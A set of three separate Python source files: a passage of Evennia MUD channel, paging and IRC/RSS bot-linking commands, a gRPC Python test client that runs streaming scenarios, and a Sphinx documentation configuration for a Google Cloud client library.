    account_caller = True

    def func(self):
        """Implement the command"""

        caller = self.caller

        if not self.args:
            self.msg("Usage @ccreate <channelname>[;alias;alias..] = description")
            return

        description = self.rhs if self.rhs else ""

        channame = self.lhs
        aliases = None
        if ';' in channame:
            # remaining ;-separated parts become channel aliases
            channame, aliasstring = channame.split(';', 1)
            aliases = [alias.strip().lower() for alias in aliasstring.split(';')]

        if ChannelDB.objects.channel_search(channame):
            self.msg("A channel with that name already exists.")
            return

        # Create and set the channel up
        # - anyone may send/listen, only the creator controls it
        lockstring = "send:all();listen:all();control:id(%s)" % caller.id
        new_chan = create.create_channel(channame.strip(),
                                         aliases,
                                         description,
                                         locks=lockstring)
        new_chan.connect(caller)
        CHANNELHANDLER.update()
        self.msg("Created channel %s and connected to it." % new_chan.key)
class CmdClock(COMMAND_DEFAULT_CLASS):
    """
    change channel locks of a channel you control

    Usage:
      @clock <channel> [= <lockstring>]

    Changes the lock access restrictions of a channel. If no
    lockstring was given, view the current lock definitions.
    """

    key = "@clock"
    locks = "cmd:not pperm(channel_banned)"
    aliases = ["@clock"]
    help_category = "Comms"

    # this is used by the COMMAND_DEFAULT_CLASS parent
    account_caller = True

    def func(self):
        """run the function"""

        if not self.args:
            self.msg("Usage: @clock channel [= lockstring]")
            return

        channel = find_channel(self.caller, self.lhs)
        if not channel:
            return

        if not self.rhs:
            # no =, so just view the current locks
            self.msg("Current locks on %s:\n %s" % (channel.key, channel.locks))
            return

        # we want to add/change a lock.
        if not channel.access(self.caller, "control"):
            self.msg("You don't control this channel.")
            return
        # Try to add the lock
        try:
            channel.locks.add(self.rhs)
        except LockException as err:
            self.msg(err)
            return
        self.msg("Lock(s) applied. Current locks on %s:\n %s" % (channel.key, channel.locks))
class CmdCdesc(COMMAND_DEFAULT_CLASS):
    """
    describe a channel you control
    Usage:
      @cdesc <channel> = <description>
    Changes the description of the channel as shown in
    channel lists.
    """
    key = "@cdesc"
    locks = "cmd:not pperm(channel_banned)"
    help_category = "Comms"
    # this is used by the COMMAND_DEFAULT_CLASS parent
    account_caller = True

    def func(self):
        """Update the channel description shown in channel lists."""
        if not self.rhs:
            self.msg("Usage: @cdesc <channel> = <description>")
            return
        account = self.caller
        channel = find_channel(account, self.lhs)
        if not channel:
            self.msg("Channel '%s' not found." % self.lhs)
            return
        # Only someone controlling the channel may change its description.
        if not channel.access(account, 'control'):
            self.msg("You cannot admin this channel.")
            return
        # Store the new description and persist it.
        channel.db.desc = self.rhs
        channel.save()
        self.msg("Description of channel '%s' set to '%s'." % (channel.key,
                                                               self.rhs))
class CmdPage(COMMAND_DEFAULT_CLASS):
    """
    send a private message to another account
    Usage:
      page[/switches] [<account>,<account>,... = <message>]
      tell        ''
      page <number>
    Switch:
      last - shows who you last messaged
      list - show your last <number> of tells/pages (default)
    Send a message to target user (if online). If no
    argument is given, you will get a list of your latest messages.
    """
    key = "page"
    aliases = ['tell']
    locks = "cmd:not pperm(page_banned)"
    help_category = "Comms"
    # this is used by the COMMAND_DEFAULT_CLASS parent
    account_caller = True

    def func(self):
        """Implement function using the Msg methods"""
        # Since account_caller is set above, this will be an Account.
        caller = self.caller
        # get the messages we've sent (not to channels)
        pages_we_sent = Msg.objects.get_messages_by_sender(caller, exclude_channel_messages=True)
        # get last messages we've got
        pages_we_got = Msg.objects.get_messages_by_receiver(caller)
        if 'last' in self.switches:
            # show only the most recent page we sent
            if pages_we_sent:
                recv = ",".join(obj.key for obj in pages_we_sent[-1].receivers)
                self.msg("You last paged |c%s|n:%s" % (recv, pages_we_sent[-1].message))
                return
            else:
                self.msg("You haven't paged anyone yet.")
                return
        if not self.args or not self.rhs:
            # no message to send - show our message history instead
            pages = pages_we_sent + pages_we_got
            # Fix: list.sort() no longer accepts a comparison function and
            # cmp() was removed in Python 3 - sort chronologically by key.
            pages.sort(key=lambda page: page.date_created)
            number = 5
            if self.args:
                try:
                    number = int(self.args)
                except ValueError:
                    self.msg("Usage: tell [<account> = msg]")
                    return
            # keep only the `number` most recent messages
            if len(pages) > number:
                lastpages = pages[-number:]
            else:
                lastpages = pages
            template = "|w%s|n |c%s|n to |c%s|n: %s"
            lastpages = "\n ".join(template %
                                   (utils.datetime_format(page.date_created),
                                    ",".join(obj.key for obj in page.senders),
                                    "|n,|c ".join([obj.name for obj in page.receivers]),
                                    page.message) for page in lastpages)
            if lastpages:
                string = "Your latest pages:\n %s" % lastpages
            else:
                string = "You haven't paged anyone yet."
            self.msg(string)
            return
        # We are sending. Build a list of targets
        if not self.lhs:
            # If there are no targets, then set the targets
            # to the last person we paged.
            if pages_we_sent:
                receivers = pages_we_sent[-1].receivers
            else:
                self.msg("Who do you want to page?")
                return
        else:
            receivers = self.lhslist
        recobjs = []
        for receiver in set(receivers):
            # Fix: basestring does not exist in Python 3; receivers are
            # either name strings or account-like objects.
            if isinstance(receiver, str):
                pobj = caller.search(receiver)
            elif hasattr(receiver, 'character'):
                pobj = receiver
            else:
                self.msg("Who do you want to page?")
                return
            if pobj:
                recobjs.append(pobj)
        if not recobjs:
            self.msg("Noone found to page.")
            return
        header = "|wAccount|n |c%s|n |wpages:|n" % caller.key
        message = self.rhs
        # if message begins with a :, we assume it is a 'page-pose'
        if message.startswith(":"):
            message = "%s %s" % (caller.key, message.strip(':').strip())
        # create the persistent message object
        create.create_message(caller, message,
                              receivers=recobjs)
        # tell the accounts they got a message.
        received = []
        rstrings = []
        for pobj in recobjs:
            if not pobj.access(caller, 'msg'):
                rstrings.append("You are not allowed to page %s." % pobj)
                continue
            pobj.msg("%s %s" % (header, message))
            # offline receivers still get the stored message later
            if hasattr(pobj, 'sessions') and not pobj.sessions.count():
                received.append("|C%s|n" % pobj.name)
                rstrings.append("%s is offline. They will see your message if they list their pages later."
                                % received[-1])
            else:
                received.append("|c%s|n" % pobj.name)
        if rstrings:
            self.msg("\n".join(rstrings))
        self.msg("You paged %s with: '%s'." % (", ".join(received), message))
def _list_bots():
    """
    Helper function to produce a list of all IRC bots.
    Returns:
        bots (str): A table of bots or an error message.
    """
    ircbots = list(AccountDB.objects.filter(db_is_bot=True, username__startswith="ircbot-"))
    if not ircbots:
        return "No irc bots found."
    from evennia.utils.evtable import EvTable
    table = EvTable("|w#dbref|n", "|wbotname|n", "|wev-channel|n",
                    "|wirc-channel|n", "|wSSL|n", maxwidth=_DEFAULT_WIDTH)
    # One row per bot: dbref, nick, evennia channel, irc target, ssl flag.
    for ircbot in ircbots:
        ircinfo = "%s (%s:%s)" % (ircbot.db.irc_channel, ircbot.db.irc_network, ircbot.db.irc_port)
        table.add_row("#%i" % ircbot.id, ircbot.db.irc_botname, ircbot.db.ev_channel, ircinfo, ircbot.db.irc_ssl)
    return table
class CmdIRC2Chan(COMMAND_DEFAULT_CLASS):
    """
    link an evennia channel to an external IRC channel
    Usage:
      @irc2chan[/switches] <evennia_channel> = <ircnetwork> <port> <#irchannel> <botname>[:typeclass]
      @irc2chan/delete botname|#dbid
    Switches:
      /delete     - this will delete the bot and remove the irc connection
                    to the channel. Requires the botname or #dbid as input.
      /remove     - alias to /delete
      /disconnect - alias to /delete
      /list       - show all irc<->evennia mappings
      /ssl        - use an SSL-encrypted connection
    Example:
      @irc2chan myircchan = irc.dalnet.net 6667 #mychannel evennia-bot
      @irc2chan public = irc.freenode.net 6667 #evgaming #evbot:accounts.mybot.MyBot
    This creates an IRC bot that connects to a given IRC network and
    channel. If a custom typeclass path is given, this will be used
    instead of the default bot class.
    The bot will relay everything said in the evennia channel to the
    IRC channel and vice versa. The bot will automatically connect at
    server start, so this command need only be given once. The
    /disconnect switch will permanently delete the bot. To only
    temporarily deactivate it, use the |w@services|n command instead.
    Provide an optional bot class path to use a custom bot.
    """
    key = "@irc2chan"
    locks = "cmd:serversetting(IRC_ENABLED) and pperm(Developer)"
    help_category = "Comms"

    def func(self):
        """Setup the irc-channel mapping"""
        if not settings.IRC_ENABLED:
            string = """IRC is not enabled. You need to activate it in game/settings.py."""
            self.msg(string)
            return
        if 'list' in self.switches:
            # show all connections
            self.msg(_list_bots())
            return
        if 'disconnect' in self.switches or 'remove' in self.switches or 'delete' in self.switches:
            # look the bot up by name first, then by #dbref
            botname = "ircbot-%s" % self.lhs
            matches = AccountDB.objects.filter(db_is_bot=True, username=botname)
            dbref = utils.dbref(self.lhs)
            if not matches and dbref:
                # try dbref match
                matches = AccountDB.objects.filter(db_is_bot=True, id=dbref)
            if matches:
                matches[0].delete()
                self.msg("IRC connection destroyed.")
            else:
                self.msg("IRC connection/bot could not be removed, does it exist?")
            return
        if not self.args or not self.rhs:
            string = "Usage: @irc2chan[/switches] <evennia_channel> =" \
                     " <ircnetwork> <port> <#irchannel> <botname>[:typeclass]"
            self.msg(string)
            return
        channel = self.lhs
        self.rhs = self.rhs.replace('#', ' ')  # to avoid Python comment issues
        try:
            irc_network, irc_port, irc_channel, irc_botname = \
                [part.strip() for part in self.rhs.split(None, 4)]
            irc_channel = "#%s" % irc_channel
        except Exception:
            string = "IRC bot definition '%s' is not valid." % self.rhs
            self.msg(string)
            return
        botclass = None
        if ":" in irc_botname:
            # Split off an optional custom typeclass path. Fix: maxsplit must
            # be 1 here - we unpack exactly two names, and with the previous
            # maxsplit of 2 a second ':' in the input raised an uncaught
            # ValueError instead of producing a clean error message below.
            irc_botname, botclass = [part.strip() for part in irc_botname.split(":", 1)]
        botname = "ircbot-%s" % irc_botname
        # If path given, use custom bot otherwise use default.
        botclass = botclass if botclass else bots.IRCBot
        irc_ssl = "ssl" in self.switches
        # create a new bot
        bot = AccountDB.objects.filter(username__iexact=botname)
        if bot:
            # re-use an existing bot
            bot = bot[0]
            if not bot.is_bot:
                self.msg("Account '%s' already exists and is not a bot." % botname)
                return
        else:
            try:
                bot = create.create_account(botname, None, None, typeclass=botclass)
            except Exception as err:
                self.msg("|rError, could not create the bot:|n '%s'." % err)
                return
        bot.start(ev_channel=channel, irc_botname=irc_botname, irc_channel=irc_channel,
                  irc_network=irc_network, irc_port=irc_port, irc_ssl=irc_ssl)
        self.msg("Connection created. Starting IRC bot.")
class CmdIRCStatus(COMMAND_DEFAULT_CLASS):
    """
    Check and reboot IRC bot.
    Usage:
      ircstatus [#dbref ping||nicklist||reconnect]
    If not given arguments, will return a list of all bots (like
    @irc2chan/list). The 'ping' argument will ping the IRC network to
    see if the connection is still responsive. The 'nicklist' argument
    (aliases are 'who' and 'users') will return a list of users on the
    remote IRC channel. Finally, 'reconnect' will force the client to
    disconnect and reconnect again. This may be a last resort if the
    client has silently lost connection (this may happen if the remote
    network experience network issues). During the reconnection
    messages sent to either channel will be lost.
    """
    key = "@ircstatus"
    # Fix: the original lockstring had an unbalanced closing parenthesis
    # ("... perm(ircstatus) or perm(Builder))"); the trailing ')' shows the
    # intended grouping was (ircstatus OR Builder), both gated on IRC_ENABLED.
    locks = "cmd:serversetting(IRC_ENABLED) and (perm(ircstatus) or perm(Builder))"
    help_category = "Comms"

    def func(self):
        """Handles the functioning of the command."""
        if not self.args:
            self.msg(_list_bots())
            return
        # should always be on the form botname option
        args = self.args.split()
        if len(args) != 2:
            self.msg("Usage: @ircstatus [#dbref ping||nicklist||reconnect]")
            return
        botname, option = args
        if option not in ("ping", "users", "reconnect", "nicklist", "who"):
            self.msg("Not a valid option.")
            return
        matches = None
        if utils.dbref(botname):
            matches = AccountDB.objects.filter(db_is_bot=True, id=utils.dbref(botname))
        if not matches:
            self.msg("No matching IRC-bot found. Use @ircstatus without arguments to list active bots.")
            return
        ircbot = matches[0]
        channel = ircbot.db.irc_channel
        network = ircbot.db.irc_network
        port = ircbot.db.irc_port
        chtext = "IRC bot '%s' on channel %s (%s:%s)" % (ircbot.db.irc_botname, channel, network, port)
        if option == "ping":
            # check connection by sending outself a ping through the server.
            self.caller.msg("Pinging through %s." % chtext)
            ircbot.ping(self.caller)
        elif option in ("users", "nicklist", "who"):
            # retrieve user list. The bot must handles the echo since it's
            # an asynchronous call.
            self.caller.msg("Requesting nicklist from %s (%s:%s)." % (channel, network, port))
            ircbot.get_nicklist(self.caller)
        elif self.caller.locks.check_lockstring(self.caller, "dummy:perm(ircstatus) or perm(Developer)"):
            # option is "reconnect" here (everything else was handled above)
            # and the caller has the extra permission needed to force it.
            self.caller.msg("Forcing a disconnect + reconnect of %s." % chtext)
            ircbot.reconnect()
        else:
            self.caller.msg("You don't have permission to force-reload the IRC bot.")
# RSS connection
class CmdRSS2Chan(COMMAND_DEFAULT_CLASS):
    """
    link an evennia channel to an external RSS feed
    Usage:
      @rss2chan[/switches] <evennia_channel> = <rss_url>
    Switches:
      /disconnect - this will stop the feed and remove the connection to the
                    channel.
      /remove     - "
      /list       - show all rss->evennia mappings
    Example:
      @rss2chan rsschan = http://code.google.com/feeds/p/evennia/updates/basic
    This creates an RSS reader that connects to a given RSS feed url. Updates
    will be echoed as a title and news link to the given channel. The rate of
    updating is set with the RSS_UPDATE_INTERVAL variable in settings (default
    is every 10 minutes).
    When disconnecting you need to supply both the channel and url again so as
    to identify the connection uniquely.
    """
    key = "@rss2chan"
    locks = "cmd:serversetting(RSS_ENABLED) and pperm(Developer)"
    help_category = "Comms"

    def func(self):
        """Setup the rss-channel mapping"""
        # checking we have all we need
        if not settings.RSS_ENABLED:
            string = """RSS is not enabled. You need to activate it in game/settings.py."""
            self.msg(string)
            return
        try:
            import feedparser
            assert feedparser  # to avoid checker error of not being used
        except ImportError:
            string = "RSS requires python-feedparser (https://pypi.python.org/pypi/feedparser)." \
                     " Install before continuing."
            self.msg(string)
            return
        if 'list' in self.switches:
            # show all connections
            rssbots = [bot for bot in AccountDB.objects.filter(db_is_bot=True, username__startswith="rssbot-")]
            if rssbots:
                from evennia.utils.evtable import EvTable
                table = EvTable("|wdbid|n", "|wupdate rate|n", "|wev-channel",
                                "|wRSS feed URL|n", border="cells", maxwidth=_DEFAULT_WIDTH)
                for rssbot in rssbots:
                    table.add_row(rssbot.id, rssbot.db.rss_rate, rssbot.db.ev_channel, rssbot.db.rss_url)
                self.msg(table)
            else:
                self.msg("No rss bots found.")
            return
        if 'disconnect' in self.switches or 'remove' in self.switches or 'delete' in self.switches:
            botname = "rssbot-%s" % self.lhs
            matches = AccountDB.objects.filter(db_is_bot=True, db_key=botname)
            if not matches:
                # Try a #dbref match. Fix: filter through utils.dbref() as
                # CmdIRC2Chan does - the previous id=self.args.lstrip("#")
                # raised an uncaught ValueError for any non-numeric input.
                dbref = utils.dbref(self.lhs)
                if dbref:
                    matches = AccountDB.objects.filter(db_is_bot=True, id=dbref)
            if matches:
                matches[0].delete()
                self.msg("RSS connection destroyed.")
            else:
                self.msg("RSS connection/bot could not be removed, does it exist?")
            return
        if not self.args or not self.rhs:
            string = "Usage: @rss2chan[/switches] <evennia_channel> = <rss url>"
            self.msg(string)
            return
        channel = self.lhs
        url = self.rhs
        botname = "rssbot-%s" % url
        # create a new bot
        bot = AccountDB.objects.filter(username__iexact=botname)
        if bot:
            # re-use existing bot
            bot = bot[0]
            if not bot.is_bot:
                self.msg("Account '%s' already exists and is not a bot." % botname)
                return
        else:
            bot = create.create_account(botname, None, None, typeclass=bots.RSSBot)
        bot.start(ev_channel=channel, rss_url=url, rss_rate=10)
        self.msg("RSS reporter created. Fetching RSS.")
| |
# Copyright 2017 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""An example gRPC Python-using client-side application."""
import collections
import enum
import threading
import time
import grpc
from tests.testing import _application_common
from tests.testing.proto import requests_pb2
from tests.testing.proto import services_pb2
from tests.testing.proto import services_pb2_grpc
from tests.unit.framework.common import test_constants
@enum.unique
class Scenario(enum.Enum):
    """Client-side scenarios this test application knows how to run."""
    UNARY_UNARY = 'unary unary'
    UNARY_STREAM = 'unary stream'
    STREAM_UNARY = 'stream unary'
    STREAM_STREAM = 'stream stream'
    CONCURRENT_STREAM_UNARY = 'concurrent stream unary'
    CONCURRENT_STREAM_STREAM = 'concurrent stream stream'
    CANCEL_UNARY_UNARY = 'cancel unary unary'
    CANCEL_UNARY_STREAM = 'cancel unary stream'
    INFINITE_REQUEST_STREAM = 'infinite request stream'
class Outcome(collections.namedtuple('Outcome', ('kind', 'code', 'details'))):
    """Outcome of a client application scenario.
    Attributes:
      kind: A Kind value describing the overall kind of scenario execution.
      code: A grpc.StatusCode value. Only valid if kind is Kind.RPC_ERROR.
      details: A status details string. Only valid if kind is Kind.RPC_ERROR.
    """

    @enum.unique
    class Kind(enum.Enum):
        """Broad classification of how a scenario run ended."""
        SATISFACTORY = 'satisfactory'
        UNSATISFACTORY = 'unsatisfactory'
        RPC_ERROR = 'rpc error'
# Shared singleton outcomes reused by every scenario runner below; the
# code/details fields only carry information for RPC_ERROR outcomes.
_SATISFACTORY_OUTCOME = Outcome(Outcome.Kind.SATISFACTORY, None, None)
_UNSATISFACTORY_OUTCOME = Outcome(Outcome.Kind.UNSATISFACTORY, None, None)
class _Pipe(object):
    """A thread-safe, closable FIFO usable as a blocking request iterator."""

    def __init__(self):
        self._condition = threading.Condition()
        self._values = []
        self._open = True

    def __iter__(self):
        return self

    def _next(self):
        # Block until a value is available or the pipe is closed and drained.
        with self._condition:
            while not self._values and self._open:
                self._condition.wait()
            if self._values:
                return self._values.pop(0)
            raise StopIteration()

    def __next__(self):  # (Python 3 Iterator Protocol)
        return self._next()

    def next(self):  # (Python 2 Iterator Protocol)
        return self._next()

    def add(self, value):
        """Append a value and wake any consumer blocked in _next."""
        with self._condition:
            self._values.append(value)
            self._condition.notify_all()

    def close(self):
        """Mark the pipe closed; pending values are still delivered."""
        with self._condition:
            self._open = False
            self._condition.notify_all()
def _run_unary_unary(stub):
    """Run the unary-unary scenario; satisfactory iff the response matches."""
    response = stub.UnUn(_application_common.UNARY_UNARY_REQUEST)
    matched = response == _application_common.UNARY_UNARY_RESPONSE
    return _SATISFACTORY_OUTCOME if matched else _UNSATISFACTORY_OUTCOME
def _run_unary_stream(stub):
    """Run the unary-stream scenario; the server must send an empty stream."""
    response_iterator = stub.UnStre(_application_common.UNARY_STREAM_REQUEST)
    for _ in response_iterator:
        # Any response at all is unexpected.
        return _UNSATISFACTORY_OUTCOME
    return _SATISFACTORY_OUTCOME
def _run_stream_unary(stub):
    """Send three identical requests; expect one OK response that matches."""
    requests = iter((_application_common.STREAM_UNARY_REQUEST,) * 3)
    response, call = stub.StreUn.with_call(requests)
    ok = (call.code() is grpc.StatusCode.OK and
          response == _application_common.STREAM_UNARY_RESPONSE)
    return _SATISFACTORY_OUTCOME if ok else _UNSATISFACTORY_OUTCOME
def _run_stream_stream(stub):
    """Exercise the bidirectional-streaming RPC with interleaved traffic.

    Feeds one request at a time through a _Pipe and expects exactly two
    responses per request; after closing the request stream, no further
    responses may arrive. The strict request/response ordering is the point
    of the test - do not reorder these calls.
    """
    request_pipe = _Pipe()
    response_iterator = stub.StreStre(iter(request_pipe))
    # First request -> exactly two responses expected.
    request_pipe.add(_application_common.STREAM_STREAM_REQUEST)
    first_responses = next(response_iterator), next(response_iterator)
    # Second request -> again exactly two responses.
    request_pipe.add(_application_common.STREAM_STREAM_REQUEST)
    second_responses = next(response_iterator), next(response_iterator)
    request_pipe.close()
    # After closing the request stream the response stream must end too.
    try:
        next(response_iterator)
    except StopIteration:
        unexpected_extra_response = False
    else:
        unexpected_extra_response = True
    if (first_responses == _application_common.TWO_STREAM_STREAM_RESPONSES and
            second_responses == _application_common.TWO_STREAM_STREAM_RESPONSES
            and not unexpected_extra_response):
        return _SATISFACTORY_OUTCOME
    else:
        return _UNSATISFACTORY_OUTCOME
def _run_concurrent_stream_unary(stub):
    """Launch many stream-unary RPCs concurrently and verify every response."""
    future_calls = tuple(
        stub.StreUn.future(iter((_application_common.STREAM_UNARY_REQUEST,) *
                                3))
        for _ in range(test_constants.THREAD_CONCURRENCY))
    for future_call in future_calls:
        if future_call.code() is grpc.StatusCode.OK:
            response = future_call.result()
            if _application_common.STREAM_UNARY_RESPONSE != response:
                return _UNSATISFACTORY_OUTCOME
        else:
            return _UNSATISFACTORY_OUTCOME
    else:
        # Note: this is a for/else - only reached when no call above failed.
        return _SATISFACTORY_OUTCOME
def _run_concurrent_stream_stream(stub):
    """Run _run_stream_stream on many threads; all must be satisfactory."""
    condition = threading.Condition()
    # One slot per thread; a slot is truthy once its thread has finished.
    outcomes = [None] * test_constants.RPC_CONCURRENCY

    def run_stream_stream(index):
        # Record this thread's outcome and wake the waiting main thread.
        outcome = _run_stream_stream(stub)
        with condition:
            outcomes[index] = outcome
            condition.notify()

    for index in range(test_constants.RPC_CONCURRENCY):
        thread = threading.Thread(target=run_stream_stream, args=(index,))
        thread.start()
    with condition:
        while True:
            if all(outcomes):
                # Every slot is filled; fail if any thread was unsatisfactory.
                for outcome in outcomes:
                    if outcome.kind is not Outcome.Kind.SATISFACTORY:
                        return _UNSATISFACTORY_OUTCOME
                else:
                    return _SATISFACTORY_OUTCOME
            else:
                condition.wait()
def _run_cancel_unary_unary(stub):
    """Start a unary-unary RPC, then cancel it after initial metadata."""
    future = stub.UnUn.future(_application_common.UNARY_UNARY_REQUEST)
    # Wait for initial metadata so the RPC is known to be in flight.
    metadata_arrived = future.initial_metadata() is not None
    if future.cancel() and metadata_arrived:
        return _SATISFACTORY_OUTCOME
    return _UNSATISFACTORY_OUTCOME
def _run_infinite_request_stream(stub):
    """Verify that an unbounded request stream is cut off by its deadline."""

    def endless_requests():
        # Never-terminating request generator; only the deadline stops it.
        while True:
            yield _application_common.STREAM_UNARY_REQUEST

    future = stub.StreUn.future(
        endless_requests(),
        timeout=_application_common.INFINITE_REQUEST_STREAM_TIMEOUT)
    if future.code() is grpc.StatusCode.DEADLINE_EXCEEDED:
        return _SATISFACTORY_OUTCOME
    return _UNSATISFACTORY_OUTCOME
# Maps each Scenario to its runner function.
# NOTE(review): Scenario.CANCEL_UNARY_STREAM has no entry here, so selecting
# it makes run() raise KeyError - presumably an upstream omission; confirm
# before exercising that scenario.
_IMPLEMENTATIONS = {
    Scenario.UNARY_UNARY: _run_unary_unary,
    Scenario.UNARY_STREAM: _run_unary_stream,
    Scenario.STREAM_UNARY: _run_stream_unary,
    Scenario.STREAM_STREAM: _run_stream_stream,
    Scenario.CONCURRENT_STREAM_UNARY: _run_concurrent_stream_unary,
    Scenario.CONCURRENT_STREAM_STREAM: _run_concurrent_stream_stream,
    Scenario.CANCEL_UNARY_UNARY: _run_cancel_unary_unary,
    Scenario.INFINITE_REQUEST_STREAM: _run_infinite_request_stream,
}
def run(scenario, channel):
    """Execute one scenario over the given channel and return its Outcome."""
    stub = services_pb2_grpc.FirstServiceStub(channel)
    implementation = _IMPLEMENTATIONS[scenario]
    try:
        return implementation(stub)
    except grpc.RpcError as rpc_error:
        # Any RPC failure is folded into an RPC_ERROR outcome.
        return Outcome(Outcome.Kind.RPC_ERROR, rpc_error.code(),
                       rpc_error.details())
| |
# -*- coding: utf-8 -*-
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# google-cloud-service-usage documentation build configuration file
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
import shlex
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath(".."))
# For plugins that can not read conf.py.
# See also: https://github.com/docascode/sphinx-docfx-yaml/issues/85
sys.path.insert(0, os.path.abspath("."))
__version__ = ""
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
needs_sphinx = "1.5.5"
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
"sphinx.ext.autodoc",
"sphinx.ext.autosummary",
"sphinx.ext.intersphinx",
"sphinx.ext.coverage",
"sphinx.ext.doctest",
"sphinx.ext.napoleon",
"sphinx.ext.todo",
"sphinx.ext.viewcode",
"recommonmark",
]
# autodoc/autosummary flags
autoclass_content = "both"
autodoc_default_options = {"members": True}
autosummary_generate = True
# Add any paths that contain templates here, relative to this directory.
templates_path = ["_templates"]
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
# source_suffix = ['.rst', '.md']
source_suffix = [".rst", ".md"]
# The encoding of source files.
# source_encoding = 'utf-8-sig'
# The root toctree document.
root_doc = "index"
# General information about the project.
project = "google-cloud-service-usage"
copyright = "2019, Google"
author = "Google APIs"
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The full version, including alpha/beta/rc tags.
release = __version__
# The short X.Y version.
version = ".".join(release.split(".")[0:2])
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
# Sphinx >= 5 warns on ``language = None`` and coerces it to "en"; set the
# default explicitly to keep builds warning-free.
language = "en"
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
# today = ''
# Else, today_fmt is used as the format for a strftime call.
# today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = [
"_build",
"**/.nox/**/*",
"samples/AUTHORING_GUIDE.md",
"samples/CONTRIBUTING.md",
"samples/snippets/README.rst",
]
# The reST default role (used for this markup: `text`) to use for all
# documents.
# default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
# add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
# add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
# show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = "sphinx"
# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
# keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = True
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = "alabaster"
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
html_theme_options = {
"description": "Google Cloud Client Libraries for google-cloud-service-usage",
"github_user": "googleapis",
"github_repo": "python-service-usage",
"github_banner": True,
"font_family": "'Roboto', Georgia, sans",
"head_font_family": "'Roboto', Georgia, serif",
"code_font_family": "'Roboto Mono', 'Consolas', monospace",
}
# Add any paths that contain custom themes here, relative to this directory.
# html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
# html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
# html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
# html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
# html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ["_static"]
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
# html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
# html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
# html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
# html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
# html_additional_pages = {}
# If false, no module index is generated.
# html_domain_indices = True
# If false, no index is generated.
# html_use_index = True
# If true, the index is split into individual pages for each letter.
# html_split_index = False
# If true, links to the reST sources are added to the pages.
# html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
# html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
# html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
# html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
# html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr'
# html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
# html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
# html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = "google-cloud-service-usage-doc"
# -- Options for warnings ------------------------------------------------------
suppress_warnings = [
# Temporarily suppress this to avoid "more than one target found for
# cross-reference" warning, which are intractable for us to avoid while in
# a mono-repo.
# See https://github.com/sphinx-doc/sphinx/blob
# /2a65ffeef5c107c19084fabdd706cdff3f52d93c/sphinx/domains/python.py#L843
"ref.python"
]
